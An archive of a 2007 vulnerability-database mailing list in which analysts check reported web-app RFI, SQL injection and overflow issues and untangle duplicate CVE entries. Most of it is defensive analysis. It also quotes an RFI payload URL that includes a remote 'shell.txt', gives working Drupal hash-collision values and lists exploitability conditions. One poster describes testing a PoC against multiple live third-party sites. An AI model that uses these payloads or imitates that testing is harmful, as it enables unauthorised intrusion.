From theall at tenablesecurity.com Mon Oct 1 00:10:01 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Sun, 30 Sep 2007 20:10:01 -0400 Subject: [VIM] Bogus: mxBB Module mx_glance 2.3.3 Remote File Include Vulnerability Message-ID: <47003AD9.4080606@tenablesecurity.com> Milw0rm 4470 / Bugtraq 25866 seems bogus to me -- looking at the copy of contrib/mx_glance_sdesc.php included in http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=336 shows this: ---- snip, snip, snip ---- References: <47003AD9.4080606@tenablesecurity.com> Message-ID: <47004ED5.3010904@milw0rm.com> Check out where the /* starts and */ ends. Must of been a coding mistake but the vulnerability is there. /str0ke George A. Theall wrote: > Milw0rm 4470 / Bugtraq 25866 seems bogus to me -- looking at the copy > of contrib/mx_glance_sdesc.php included in > http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=336 > shows this: > > ---- snip, snip, snip ---- > /** > * > * @package mxBB Portal Module - mx_glance > * @version $Id: mx_glance.php,v 2.3.3 2007/01/31 11:58:22 OryNider Exp $ > ... > if( !defined('IN_PORTAL') || !is_object($mx_block)) > { > die("Hacking attempt"); > } > ---- snip, snip, snip ---- > > So direct calls to the affected script will fail. > > > George From theall at tenablesecurity.com Mon Oct 1 01:40:55 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Sun, 30 Sep 2007 21:40:55 -0400 Subject: [VIM] Bogus: mxBB Module mx_glance 2.3.3 Remote File Include Vulnerability In-Reply-To: <47004ED5.3010904@milw0rm.com> References: <47003AD9.4080606@tenablesecurity.com> <47004ED5.3010904@milw0rm.com> Message-ID: <47005027.4020701@tenablesecurity.com> On 09/30/07 21:35, str0ke wrote: > Check out where the /* starts and */ ends. Must of been a coding > mistake but the vulnerability is there. Ah, I missed that. Thanks for clearing it up. George -- theall at tenablesecurity.com From theall at tenablesecurity.com Mon Oct 1 17:20:27 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 01 Oct 2007 13:20:27 -0400 Subject: [VIM] Bogus: Segue CMS <= 1.8.4 index.php Remote File Inclusion Vulnerability Message-ID: <47012C5B.5060101@tenablesecurity.com> It looks like Milw0rm 4476 is bogus -- $themedir is set in config.inc.php to 'themes', and it does not seem to be overwritten later. [config.inc.php is not included in the distribution file but it's created from config_sample.inc.php as part of the installation process.] Or did I mess this one up too? George -- theall at tenablesecurity.com From str0ke at milw0rm.com Mon Oct 1 17:29:31 2007 From: str0ke at milw0rm.com (str0ke) Date: Mon, 01 Oct 2007 12:29:31 -0500 Subject: [VIM] Bogus: Segue CMS <= 1.8.4 index.php Remote File Inclusion Vulnerability In-Reply-To: <47012C5B.5060101@tenablesecurity.com> References: <47012C5B.5060101@tenablesecurity.com> Message-ID: <47012E7B.5080302@milw0rm.com> Hey George, Ya I thought the same thing, tested it on multiple sites ranging from 1.8.4 and below and worked like a charm. George A. Theall wrote: > It looks like Milw0rm 4476 is bogus -- $themedir is set in > config.inc.php to 'themes', and it does not seem to be overwritten > later. [config.inc.php is not included in the distribution file but > it's created from config_sample.inc.php as part of the installation > process.] > > Or did I mess this one up too? > > George From theall at tenablesecurity.com Mon Oct 1 17:31:58 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 01 Oct 2007 13:31:58 -0400 Subject: [VIM] Bogus: Segue CMS <= 1.8.4 index.php Remote File Inclusion Vulnerability In-Reply-To: <47012E7B.5080302@milw0rm.com> References: <47012C5B.5060101@tenablesecurity.com> <47012E7B.5080302@milw0rm.com> Message-ID: <47012F0E.7050106@tenablesecurity.com> On 10/01/07 13:29, str0ke wrote: > Ya I thought the same thing, tested it on multiple sites ranging from > 1.8.4 and below and worked like a charm. Hmm, I installed it locally and the PoC failed for me. George -- theall at tenablesecurity.com From str0ke at milw0rm.com Mon Oct 1 17:48:55 2007 From: str0ke at milw0rm.com (str0ke) Date: Mon, 01 Oct 2007 12:48:55 -0500 Subject: [VIM] Bogus: Segue CMS <= 1.8.4 index.php Remote File Inclusion Vulnerability In-Reply-To: <47012F0E.7050106@tenablesecurity.com> References: <47012C5B.5060101@tenablesecurity.com> <47012E7B.5080302@milw0rm.com> <47012F0E.7050106@tenablesecurity.com> Message-ID: <47013307.4090204@milw0rm.com> Strange seems after posting most of the targets are hacked or webpages have gone offline in the last 30 minutes or so. I'll fiddle with this one a little more later on today. /str0ke George A. Theall wrote: > On 10/01/07 13:29, str0ke wrote: > >> Ya I thought the same thing, tested it on multiple sites ranging from >> 1.8.4 and below and worked like a charm. > > Hmm, I installed it locally and the PoC failed for me. > > > George From theall at tenablesecurity.com Mon Oct 1 17:53:59 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 01 Oct 2007 13:53:59 -0400 Subject: [VIM] Bogus: Segue CMS <= 1.8.4 index.php Remote File Inclusion Vulnerability In-Reply-To: <47013307.4090204@milw0rm.com> References: <47012C5B.5060101@tenablesecurity.com> <47012E7B.5080302@milw0rm.com> <47012F0E.7050106@tenablesecurity.com> <47013307.4090204@milw0rm.com> Message-ID: <47013437.7090707@tenablesecurity.com> On 10/01/07 13:48, str0ke wrote: > Strange seems after posting most of the targets are hacked or webpages > have gone offline in the last 30 minutes or so. Yeah, weird. I installed 1.8.4 with register_globals and magic_quotes_gpc enabled (docs/INSTALL.txt recommends both settings) and using PHP 4.4 (old, but that's what I have in on my general LAMP lab box). Debug statements around the supposedly vulnerable line of code as well as before / after where it's set in config.inc.php show the value I'm passing in via the URL is getting overwritten and not re-appearing. George -- theall at tenablesecurity.com From str0ke at milw0rm.com Mon Oct 1 18:03:39 2007 From: str0ke at milw0rm.com (str0ke) Date: Mon, 01 Oct 2007 13:03:39 -0500 Subject: [VIM] Bogus: Segue CMS <= 1.8.4 index.php Remote File Inclusion Vulnerability In-Reply-To: <47013437.7090707@tenablesecurity.com> References: <47012C5B.5060101@tenablesecurity.com> <47012E7B.5080302@milw0rm.com> <47012F0E.7050106@tenablesecurity.com> <47013307.4090204@milw0rm.com> <47013437.7090707@tenablesecurity.com> Message-ID: <4701367B.5020103@milw0rm.com> Hey George, Test it out with globals = off Seems hes doing some hacking look at index.php for register_globals. So they need register_globals to be off for this vuln to work properly << kind of scary. /str0ke George A. Theall wrote: > On 10/01/07 13:48, str0ke wrote: > >> Strange seems after posting most of the targets are hacked or webpages >> have gone offline in the last 30 minutes or so. > > Yeah, weird. I installed 1.8.4 with register_globals and > magic_quotes_gpc enabled (docs/INSTALL.txt recommends both settings) > and using PHP 4.4 (old, but that's what I have in on my general LAMP > lab box). Debug statements around the supposedly vulnerable line of > code as well as before / after where it's set in config.inc.php show > the value I'm passing in via the URL is getting overwritten and not > re-appearing. > > > George From theall at tenablesecurity.com Mon Oct 1 18:13:20 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 01 Oct 2007 14:13:20 -0400 Subject: [VIM] Bogus: Segue CMS <= 1.8.4 index.php Remote File Inclusion Vulnerability In-Reply-To: <4701367B.5020103@milw0rm.com> References: <47012C5B.5060101@tenablesecurity.com> <47012E7B.5080302@milw0rm.com> <47012F0E.7050106@tenablesecurity.com> <47013307.4090204@milw0rm.com> <47013437.7090707@tenablesecurity.com> <4701367B.5020103@milw0rm.com> Message-ID: <470138C0.6040601@tenablesecurity.com> On 10/01/07 14:03, str0ke wrote: > Test it out with globals = off > > Seems hes doing some hacking look at index.php for register_globals. > > So they need register_globals to be off for this vuln to work properly > << kind of scary. You're right again. In includes.inc.php, there's a call to import_request_variables() if register_globals is *not* set. George -- theall at tenablesecurity.com From coley at linus.mitre.org Thu Oct 4 19:52:12 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu, 4 Oct 2007 15:52:12 -0400 (EDT) Subject: [VIM] Bogus: Segue CMS <= 1.8.4 index.php Remote File Inclusion Vulnerability In-Reply-To: <470138C0.6040601@tenablesecurity.com> References: <47012C5B.5060101@tenablesecurity.com> <47012E7B.5080302@milw0rm.com> <47012F0E.7050106@tenablesecurity.com> <47013307.4090204@milw0rm.com> <47013437.7090707@tenablesecurity.com> <4701367B.5020103@milw0rm.com> <470138C0.6040601@tenablesecurity.com> Message-ID: On Mon, 1 Oct 2007, George A. Theall wrote: > > So they need register_globals to be off for this vuln to work properly > > << kind of scary. > > You're right again. In includes.inc.php, there's a call to > import_request_variables() if register_globals is *not* set. I expect this is going to happen a LOT more as people implement their own register_globals emulations. Nice catch y'all! - Steve From coley at mitre.org Fri Oct 5 20:49:30 2007 From: coley at mitre.org (Steven M. Christey) Date: Fri, 5 Oct 2007 16:49:30 -0400 (EDT) Subject: [VIM] Clarification on xfs CVE's Message-ID: <200710052049.l95KnURh015210@faron.mitre.org> All, As of right now, this is my understanding of the CVE's associated with the xfs issues. This was a complicated issue pre-disclosure that didn't get resolved until after some initial announcements. I hope it's resolved, anyway :) CVE-2007-4989 and CVE-2007-4990 were originally reserved by iDefense from me. CVE-2007-4568 was separately assigned by the Red Hat CNA to both build_range and swap_char2b because they were both regarded as integer overflows, so I deferred to Red Hat and suggested to vendor-sec that CVE-2007-4989 and CVE-2007-4990 should be regarded as dupes. However, subsequent discussion suggested that swap_char2b is not an integer overflow, but by the time this conclusion was released, CVE-2007-4568 had already been included in several disclosures. So, CVE-2007-4990 was used to handle swap_char2b. This is why some disclosures only have CVE-2007-4568, and others list all three CVEs. At this moment, I have: CVE-2007-4568 - build_range integer overflow CVE-2007-4989 - REJECT as dupe of 4568 CVE-2007-4990 - swap_char2b "heap corruption" - Steve From theall at tenablesecurity.com Sat Oct 6 03:01:21 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Fri, 05 Oct 2007 23:01:21 -0400 Subject: [VIM] Recent GForge SQL Injection Vulnerabilities Message-ID: <4706FA81.4040203@tenablesecurity.com> In case anyone's interested, it looks like Bugtraq 25585 / CVE-2007-3913 on one hand and Bugtraq 25665 / CVE-2007-4966 on the other refer to the same issue disclosed by Sumit I. Siddharth as part of Portcullis Security Advisory 07-014. The first pair of ids refer to Debian's DSA 1369-1 advisory, which in turn credits Sumit I. Siddharth. Their patch (gforge_3.1-31sarge2.diff.gz) is fairly large, but it does fix a SQL injection issue in editprofile.php involving the variable $skill_delete. And the GForge developers have committed a somewhat different fix for the issue on September 6th, as shown here: http://lists.gforge.org/pipermail/gforge-commits/2007-September/000537.html It references CVE-2007-3913. Thoughts? George -- theall at tenablesecurity.com From coley at mitre.org Sat Oct 6 16:35:47 2007 From: coley at mitre.org (Steven M. Christey) Date: Sat, 6 Oct 2007 12:35:47 -0400 (EDT) Subject: [VIM] smells false: phpFreeLog RFI Message-ID: <200710061635.l96GZl1f006343@faron.mitre.org> Researcher: KUZ3Y (labeled as "Vendor") http://www.secumania.org/exploits/web-applications/phpfreelog-alpha-v0_2_0--%3C%3D--remote-file-inclusion-vulnerability-2007092832175/ This line is quoted: include_once $this->var_dir.$var.'.php'; with this exploit: /patch/log.php?var=http://localhost/shell.txt? First of all, $var_dir is defined to a constant path, so RFI doesn't look possible. Secondly, the include_once call is in a class definition, wrapped within a foreach: foreach ($var_types as $var) { which would overwrite $var. And, this is within a read_mod() method that appears to be called with uncontrollable data, but I'm not 100% clear on that. - Steve From jericho at attrition.org Mon Oct 8 06:00:51 2007 From: jericho at attrition.org (security curmudgeon) Date: Mon, 8 Oct 2007 06:00:51 +0000 (UTC) Subject: [VIM] new strategy for dealing with pesky vulnerabilities Message-ID: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=572 11/02/2004 Initial vendor notification 11/03/2004 Initial vendor response 12/19/2005 Second vendor notification 01/30/2007 Third vendor notification 01/30/2007 Third vendor response 04/25/2007 Status update requested 06/08/2007 Status update requested 07/24/2007 Status update requested 07/30/2007 Vendor stated product's support ended in 2002 08/06/2007 Vendor communicated their response 08/07/2007 Coordinated public disclosure November 2, 2004, HP is informed of the vulnerability in HP-UX 11.11i. Almost three years later, HP says "product's support ended in 2002". Also from the advisory: Hewlett-Packard states that this product is obsolete and no longer supported. They have no plans to release a patch or advisory. They further stated that the version of HP-UX used to verify this vulnerability is also obsolete. "HP simply recommends that customers upgrade to a currently supported OS release and to some other tool, if one is available." So it took HP almost three years to realize the software was no longer supported and say that is a solution? From jms at bughunter.ca Mon Oct 8 16:38:23 2007 From: jms at bughunter.ca (J.M. Seitz) Date: Mon, 08 Oct 2007 09:38:23 -0700 Subject: [VIM] new strategy for dealing with pesky vulnerabilities In-Reply-To: References: Message-ID: <470A5CFF.8090406@bughunter.ca> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Is it any wonder that the faith in responsible disclosure is waning? Who are you protecting by giving this to a company like HP and praying to the Greek goddess Vulnerabilica and hoping they will fix it. Meanwhile, if after 6 months you drop a 0-day because they haven't done anything, they might just move on it. But then of course you get absolutely flamed for being a black-hat.....oh well its Thanksgiving here today, turkey will make me feel better. security curmudgeon wrote: > > http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=572 > > 11/02/2004 Initial vendor notification > 11/03/2004 Initial vendor response > 12/19/2005 Second vendor notification > 01/30/2007 Third vendor notification > 01/30/2007 Third vendor response > 04/25/2007 Status update requested > 06/08/2007 Status update requested > 07/24/2007 Status update requested > 07/30/2007 Vendor stated product's support ended in 2002 > 08/06/2007 Vendor communicated their response > 08/07/2007 Coordinated public disclosure > > > November 2, 2004, HP is informed of the vulnerability in HP-UX 11.11i. > Almost three years later, HP says "product's support ended in 2002". > Also from the advisory: > > Hewlett-Packard states that this product is obsolete and no longer > supported. They have no plans to release a patch or advisory. They > further stated that the version of HP-UX used to verify this > vulnerability is also obsolete. > > "HP simply recommends that customers upgrade to a currently supported OS > release and to some other tool, if one is available." > > So it took HP almost three years to realize the software was no longer > supported and say that is a solution? > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHClz/KEj7ZJktQNsRAkRsAKCI5nyLkEesvj3ErYC75Tij0pHIIQCfcpwd NPLAvAZMAN5AYq3zJICgTnE= =fe5i -----END PGP SIGNATURE----- From theall at tenablesecurity.com Tue Oct 9 02:16:22 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 08 Oct 2007 22:16:22 -0400 Subject: [VIM] Joomla Flash Image Gallery Component RFI Vulnerability Message-ID: <470AE476.2060804@tenablesecurity.com> The affected parameter in Milw0rm 4496 is wrong -- it should be 'mosConfig_live_site' rather than 'mosConfig_absolute_path'. The affected file in at least version 1.0 of the component is: ----- snip, snip, snip ----- ----- snip, snip, snip ----- Bugtraq 25958 appears to have the same problem with the proof-of-concept they provide. George -- theall at tenablesecurity.com From str0ke at milw0rm.com Tue Oct 9 02:37:07 2007 From: str0ke at milw0rm.com (str0ke) Date: Mon, 08 Oct 2007 21:37:07 -0500 Subject: [VIM] Joomla Flash Image Gallery Component RFI Vulnerability In-Reply-To: <470AE476.2060804@tenablesecurity.com> References: <470AE476.2060804@tenablesecurity.com> Message-ID: <470AE953.6090900@milw0rm.com> This has been changed on my end, good catch. /str0ke George A. Theall wrote: > The affected parameter in Milw0rm 4496 is wrong -- it should be > 'mosConfig_live_site' rather than 'mosConfig_absolute_path'. The > affected file in at least version 1.0 of the component is: > > ----- snip, snip, snip ----- > include( "$mosConfig_live_site/components/com_wmtgallery/about.html" ); > ?> > ----- snip, snip, snip ----- > > Bugtraq 25958 appears to have the same problem with the > proof-of-concept they provide. > > > George From str0ke at milw0rm.com Thu Oct 11 19:03:06 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 11 Oct 2007 14:03:06 -0500 Subject: [VIM] false: Joomla! swMenuFree 4.6 Component Remote File Include Message-ID: <470E736A.7070902@milw0rm.com> preview.php (modified 30 March 2007) line 9: defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' ); /str0ke -------------- next part -------------- An embedded message was scrubbed... From: Guns at 0x90.com.ar Subject: Joomla! swMenuFree 4.6 Component Remote File Include Date: 11 Oct 2007 16:41:50 -0000 Size: 2129 Url: http://www.attrition.org/pipermail/vim/attachments/20071011/e6a7da3c/attachment.mht From coley at mitre.org Fri Oct 12 00:27:09 2007 From: coley at mitre.org (Steven M. Christey) Date: Thu, 11 Oct 2007 20:27:09 -0400 (EDT) Subject: [VIM] clarification on multiple Tk overflow issues Message-ID: <200710120027.l9C0R9gp013109@faron.mitre.org> Ubuntu just informed CVE of an older variant of CVE-2007-5137. CVE-2007-5378 - 8.4.12 and earlier CVE-2007-5137 - only affects 8.4.13 through 8.4.15; this was an incorrect or incomplete patch for CVE-2007-5378. These issues might look the same. My read on it is: for 5378, the second frame is LARGER than the first; for 5137, the second frame is SMALLER than the first. Note that another ID, CVE-2007-4851, was found to be a duplicate of CVE-2007-5137, so don't use 4851. - Steve ====================================================== Name: CVE-2007-5137 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5137 Reference: MISC:http://bugs.gentoo.org/show_bug.cgi?id=192539 Reference: CONFIRM:http://sourceforge.net/project/shownotes.php?release_id=541207 Reference: GENTOO:GLSA-200710-07 Reference: URL:http://security.gentoo.org/glsa/glsa-200710-07.xml Reference: BID:25826 Reference: URL:http://www.securityfocus.com/bid/25826 Reference: SECUNIA:26942 Reference: URL:http://secunia.com/advisories/26942 Reference: SECUNIA:27086 Reference: URL:http://secunia.com/advisories/27086 Buffer overflow in the ReadImage function in generic/tkImgGIF.c in Tcl (Tcl/Tk) 8.4.13 through 8.4.15 allows remote attackers to execute arbitrary code via multi-frame interlaced GIF files in which later frames are smaller than the first. NOTE: this issue is due to an incorrect patch for CVE-2007-5378. ====================================================== Name: CVE-2007-5378 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5378 Reference: CONFIRM:https://sourceforge.net/tracker/?func=detail&atid=112997&aid=1458234&group_id=12997 Buffer overflow in the FileReadGIF function in tkImgGIF.c for Tk Toolkit 8.4.12 and earlier, and 8.3.5 and earlier, allows user-assisted attackers to cause a denial of service (segmentation fault) via an animated GIF in which the first subimage is smaller than a subsequent subimage, which triggers the overflow in the ReadImage function, a different vulnerability than CVE-2007-5137. From nikns at secure.lv Fri Oct 12 08:27:59 2007 From: nikns at secure.lv (Nikns Siankin) Date: Fri, 12 Oct 2007 11:27:59 +0300 Subject: [VIM] clarification on multiple Tk overflow issues In-Reply-To: <200710120027.l9C0R9gp013109@faron.mitre.org> References: <200710120027.l9C0R9gp013109@faron.mitre.org> Message-ID: <20071012082759.GA7037@secure.lv> On Thu, Oct 11, 2007 at 08:27:09PM -0400, Steven M. Christey wrote: >CVE-2007-5378 - 8.4.12 and earlier > >CVE-2007-5137 - only affects 8.4.13 through 8.4.15; this was an >incorrect or incomplete patch for CVE-2007-5378. Hi, Steve! Why does http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5378 is inaccessible? > > > >====================================================== >Name: CVE-2007-5137 >Status: Candidate >URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5137 >Reference: MISC:http://bugs.gentoo.org/show_bug.cgi?id=192539 >Reference: CONFIRM:http://sourceforge.net/project/shownotes.php?release_id=541207 >Reference: GENTOO:GLSA-200710-07 >Reference: URL:http://security.gentoo.org/glsa/glsa-200710-07.xml >Reference: BID:25826 >Reference: URL:http://www.securityfocus.com/bid/25826 >Reference: SECUNIA:26942 >Reference: URL:http://secunia.com/advisories/26942 >Reference: SECUNIA:27086 >Reference: URL:http://secunia.com/advisories/27086 > >Buffer overflow in the ReadImage function in generic/tkImgGIF.c in Tcl >(Tcl/Tk) 8.4.13 through 8.4.15 allows remote attackers to execute >arbitrary code via multi-frame interlaced GIF files in which later >frames are smaller than the first. NOTE: this issue is due to an >incorrect patch for CVE-2007-5378. > > >====================================================== >Name: CVE-2007-5378 >Status: Candidate >URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5378 >Reference: CONFIRM:https://sourceforge.net/tracker/?func=detail&atid=112997&aid=1458234&group_id=12997 > >Buffer overflow in the FileReadGIF function in tkImgGIF.c for Tk >Toolkit 8.4.12 and earlier, and 8.3.5 and earlier, allows >user-assisted attackers to cause a denial of service (segmentation >fault) via an animated GIF in which the first subimage is smaller than >a subsequent subimage, which triggers the overflow in the ReadImage >function, a different vulnerability than CVE-2007-5137. > > From coley at mitre.org Sat Oct 13 00:21:16 2007 From: coley at mitre.org (Steven M. Christey) Date: Fri, 12 Oct 2007 20:21:16 -0400 (EDT) Subject: [VIM] CVE-2007-5324 (IBM DB2JDS overflows) is a dupe of CVE-2007-2582 Message-ID: <200710130021.l9D0LGM6003830@faron.mitre.org> ZDI recently confirmed to me that the IBM DB2JDS overflows they just reported are already covered by CVE-2007-2582. The link between the two is APAR IY97750, which was vaguely written in the initial disclosure, but it's the proper fix for the ZDI overflows. Just FYI, since some VDB's appear to have duplicate entries. We're using CVE-2007-2582 since it's been out longer. - Steve From theall at tenablesecurity.com Sat Oct 13 01:26:01 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Fri, 12 Oct 2007 21:26:01 -0400 Subject: [VIM] CVE-2007-5324 (IBM DB2JDS overflows) is a dupe of CVE-2007-2582 In-Reply-To: <200710130021.l9D0LGM6003830@faron.mitre.org> References: <200710130021.l9D0LGM6003830@faron.mitre.org> Message-ID: <47101EA9.5070700@tenablesecurity.com> On 10/12/07 20:21, Steven M. Christey wrote: > ZDI recently confirmed to me that the IBM DB2JDS overflows they just > reported are already covered by CVE-2007-2582. The link between the > two is APAR IY97750, which was vaguely written in the initial > disclosure, but it's the proper fix for the ZDI overflows. Ah, thanks for pointing that out. What about the denial of service issues ZDI also reported (invalid LANG parameter and MemTree overflow)? Neither is mentioned in IY97750, and I couldn't find them in the list of APARs IBM claimed were addressed by 8.1 FixPak 15. George -- theall at tenablesecurity.com From theall at tenablesecurity.com Sat Oct 13 11:04:51 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Sat, 13 Oct 2007 07:04:51 -0400 Subject: [VIM] Joomla Component com_colorlab 1.0 Remote File Inclusion Vulnerability Message-ID: <4710A653.9090707@tenablesecurity.com> There seems to be a mistake in Milw0rm 4524... I downloaded the component and installed it. The affected file listed in the advisory, /components/com_colorlab/admin.color.php, does not exist. But /administrator/components/com_color/admin.color.php does exist and is affected. The only line in the file, other than the PHP tags, is: include( "$mosConfig_live_site/components/com_color/about.html" ); so register_globals is required for exploitation. George -- theall at tenablesecurity.com From theall at tenablesecurity.com Sat Oct 13 11:12:04 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Sat, 13 Oct 2007 07:12:04 -0400 Subject: [VIM] Urchin Report.CGI Authorization Bypass Vulnerability Message-ID: <4710A804.6070701@tenablesecurity.com> FWIW, the authorization bypass issue in Urchin reported by MustLive (http://securityvulns.ru/Sdocument90.html) and covered by CVE-2007-5113/ Bugtraq 26037 seems to be a feature rather than a vulnerability. At least in version 5.7.03, an administrator must enable "Direct Report Linking'' (under ''Settings'', ''Access Settings''). It is disabled by default, and the online help for this setting says: "Enabling this feature allows you to circumvent authentication and create links directly to reports. This can be useful for systems that are already password or network protected"... George -- theall at tenablesecurity.com From str0ke at milw0rm.com Sat Oct 13 15:02:40 2007 From: str0ke at milw0rm.com (str0ke) Date: Sat, 13 Oct 2007 10:02:40 -0500 Subject: [VIM] Joomla Component com_colorlab 1.0 Remote File Inclusion Vulnerability In-Reply-To: <4710A653.9090707@tenablesecurity.com> References: <4710A653.9090707@tenablesecurity.com> Message-ID: <4710DE10.5030006@milw0rm.com> Thanks brotha for the info. Fixing it up. /str0ke George A. Theall wrote: > There seems to be a mistake in Milw0rm 4524... I downloaded the > component and installed it. The affected file listed in the advisory, > /components/com_colorlab/admin.color.php, does not exist. But > /administrator/components/com_color/admin.color.php does exist and is > affected. > > The only line in the file, other than the PHP tags, is: > > include( "$mosConfig_live_site/components/com_color/about.html" ); > > so register_globals is required for exploitation. > > George From coley at mitre.org Tue Oct 16 21:39:27 2007 From: coley at mitre.org (Steven M. Christey) Date: Tue, 16 Oct 2007 17:39:27 -0400 (EDT) Subject: [VIM] true: WebMod 0.48 XSS Message-ID: <200710162139.l9GLdRj0002492@faron.mitre.org> Wide publication by SECUNIA:27245 Seems to be related to a post by "nemessis" at http://sla.ckers.org/forum/read.php?3,44,11482#msg-11482 Seems to be live on some servers based on Google search results. source: http://djeyl.net/files.php#webmod auth.w appears to utilize a custom or non-typical programming language mixed with HTML, probably called W, without any apparent documentation in the WebMod package. Commands are encoded within "{}" The relevant line is:
where, from context in other source code, "G" is an array/hash/structure that contains values from GET requests. - Steve From coley at mitre.org Tue Oct 16 22:14:27 2007 From: coley at mitre.org (Steven M. Christey) Date: Tue, 16 Oct 2007 18:14:27 -0400 (EDT) Subject: [VIM] Mandriva's turn to break advisory URLs Message-ID: <200710162214.l9GMERXK003274@faron.mitre.org> Apparently, this doesn't work any more: http://frontal2.mandriva.com/security/advisories?name=MDKSA-2007:193 but this does: http://frontal2.mandriva.com/en/security/advisories?name=MDKSA-2007:193 I'll send an email inquiry/request to see if they can handle the older URLs. - Steve From coley at linus.mitre.org Wed Oct 17 19:28:00 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 17 Oct 2007 15:28:00 -0400 (EDT) Subject: [VIM] Mandriva's turn to break advisory URLs In-Reply-To: <200710162214.l9GMERXK003274@faron.mitre.org> References: <200710162214.l9GMERXK003274@faron.mitre.org> Message-ID: OK, I've cleared things up with Mandriva. The URLs are back again. They also suggested using "www.mandriva.com" as the permanent hostname instead of "frontal2.mandriva.com" Also, it looks like mandrakesoft.com URLs can be repaired in a similar fashion. - Steve From coley at mitre.org Thu Oct 18 19:38:00 2007 From: coley at mitre.org (Steven M. Christey) Date: Thu, 18 Oct 2007 15:38:00 -0400 (EDT) Subject: [VIM] true: Galmeta Post 0.11 RFI Message-ID: <200710181938.l9IJc0RC016073@faron.mitre.org> Ref: http://arfis.wordpress.com/2007/09/13/rfi-02-galmeta-post/ Context: One of our analysts is looking at arfis posts as time allows. Their record is about 50/50 in terms of disputes. In this case, the line quoted in the disclosure is the first executable line: require_once ( $DDS . .../adodb_lite/adodb.inc.php.); The distribution has a .htaccess with a RewriteRule ^([a-zA-Z0-9_\/\-\!\~]*(\&.*)?)$ index.php?$1 that might suggest protection against direct request, but it's only intended to take odd URLs without "." characters and post them to index.php. - Steve From theall at tenablesecurity.com Fri Oct 19 16:17:06 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Fri, 19 Oct 2007 12:17:06 -0400 Subject: [VIM] Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector Message-ID: <4718D882.9030200@tenablesecurity.com> Has anyone had a chance to look at Milw0rm 4510? I have two comments about it... First, it requires that register_globals be enabled so that drupal_unset_globals() in includes/bootstrap.inc tries to unset variables. But Drupal going back at least to version 4.6.3 comes with a .htaccess file intended to disable register_globals, which would seem to significantly reduce the number of possibly installs that could be attacked successfully. Second, I'm not clear where the hash value used in the PoC comes from. I implemented the code from Esser's advisory in a little hash value calculator, and running that for the '_menu' parameter tells me to use '-800928983' for PHP 4.x or '-312030023' for PHP 5.x. And indeed substituting the first value works just dandy for me on my test system. George -- theall at tenablesecurity.com From coley at mitre.org Mon Oct 29 21:00:17 2007 From: coley at mitre.org (Steven M. Christey) Date: Mon, 29 Oct 2007 17:00:17 -0400 (EDT) Subject: [VIM] Aleris Software Systems Web Publisher - site-specific? Message-ID: <200710292100.l9TL0Ha1003141@faron.mitre.org> Ref: Aleris Software Systems Web Publisher Calendar SQL injection http://www.securityfocus.com/archive/1/archive/1/482723/100/0/threaded Researcher: Joseph.giron13 The vendor's home pages don't provide any clear indication about whether this is distributable software, or something site-specific. Anybody else investigated this? - Steve From theall at tenablesecurity.com Mon Oct 29 21:16:54 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 29 Oct 2007 17:16:54 -0400 Subject: [VIM] Aleris Software Systems Web Publisher - site-specific? In-Reply-To: <200710292100.l9TL0Ha1003141@faron.mitre.org> References: <200710292100.l9TL0Ha1003141@faron.mitre.org> Message-ID: <47264DC6.2080902@tenablesecurity.com> On 10/29/07 17:00, Steven M. Christey wrote: > The vendor's home pages don't provide any clear indication about > whether this is distributable software, or something site-specific. > Anybody else investigated this? Based on the handful of sites I found to be using it, I would guess they're all designed by the same design firm (Courika Solutions); eg, - http://www.maysvillekentucky.com/calendar/page.asp?mode= - http://www.ripleylibrary.com/calendar/page.asp?mode= - http://www.masoncountyrelay.com/calendar/page.asp?mode= - http://cityofmaysville.com/calendar/page.asp?mode= - http://www.masoncoschools.com/calendar/page.asp?mode= - http://mason.k12.ky.us/calendar/page.asp?mode= But that's just a guess... I couldn't find a download either. George -- theall at tenablesecurity.com From coley at linus.mitre.org Mon Oct 29 21:21:00 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 29 Oct 2007 17:21:00 -0400 (EDT) Subject: [VIM] Aleris Software Systems Web Publisher - site-specific? In-Reply-To: <47264DC6.2080902@tenablesecurity.com> References: <200710292100.l9TL0Ha1003141@faron.mitre.org> <47264DC6.2080902@tenablesecurity.com> Message-ID: On Mon, 29 Oct 2007, George A. Theall wrote: > Based on the handful of sites I found to be using it, I would guess > they're all designed by the same design firm (Courika Solutions); eg, The site also had a product manual available for download, but it only covered the user interface - nothing about system requirements or installation. - Steve From theall at tenablesecurity.com Tue Oct 30 01:24:34 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 29 Oct 2007 21:24:34 -0400 Subject: [VIM] RealPlayer Updates of October 25, 2007 Message-ID: <472687D2.7070703@tenablesecurity.com> Real released an advisory on October 25, 2007 about several overflows in RealPlayer and gives credit to Piotr Bania and several others. Also last week Piotr released two advisories covering issues in RealPlayer that could be triggered with a specially-crafted 